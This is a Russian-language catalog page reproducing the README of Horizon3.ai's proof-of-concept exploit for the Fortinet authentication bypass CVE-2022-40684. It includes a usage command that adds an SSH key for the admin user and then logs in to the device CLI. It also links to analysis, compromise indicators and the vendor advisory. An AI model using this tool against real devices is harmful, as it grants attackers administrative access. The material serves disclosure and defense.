Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-40684 — Эксплоит PoC для CVE-2022-40684, затрагивающий Fortinet FortiOS, FortiProxy и FortiSwitchManager. | Kitploit
Инструменты/GitHubGitHub/horizon3ai/cve-2022-40684
Фреймворки для эксплойтовАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеАутентификацияRed Teaming
GitHubhorizon3ai/cve-2022-40684

CVE-2022-40684

Эксплоит PoC для CVE-2022-40684, затрагивающий Fortinet FortiOS, FortiProxy и FortiSwitchManager.

Репозиторий
358903 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-40684

POC для CVE-2022-40684, затрагивающего устройства Fortinet FortiOS, FortiProxy и FortiSwitchManager.

Технический анализ

Технический анализ первопричины уязвимости можно найти в нашем блоге: https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684

Индикаторы компрометации

Для анализа логов Fortinet на предмет индикаторов компрометации и включения более глубокого логирования посмотрите наш блог по IOC: https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/

Краткое описание

Этот POC использует уязвимость обхода аутентификации для установки SSH-ключа для указанного пользователя.

Использование

root@kitploit:~
root@kali:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub
[+] SSH key for admin added successfully!
root@kali:~# ssh [email protected]
fortios_7_2_1 # 
config      Configure object.
get         Get dynamic and system information.
show        Show configuration.
diagnose    Diagnose facility.
execute     Execute static commands.
alias       Execute alias commands.
exit        Exit the CLI.

Меры по смягчению

Обновите до последней версии или примените меры, следуя инструкциям в Fortinet PSIRT

  • https://www.fortiguard.com/psirt/FG-IR-22-377

Следите за командой Horizon3.ai Attack Team в Twitter, чтобы быть в курсе последних исследований в области безопасности:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

Отказ от ответственности

Данное программное обеспечение создано исключительно в целях академических исследований и разработки эффективных методов защиты, и не предназначено для использования для атаки на системы, за исключением случаев явного разрешения. Сопровождающие проекта не несут ответственности за неправомерное использование программного обеспечения. Используйте ответственно.

Скачать инструмент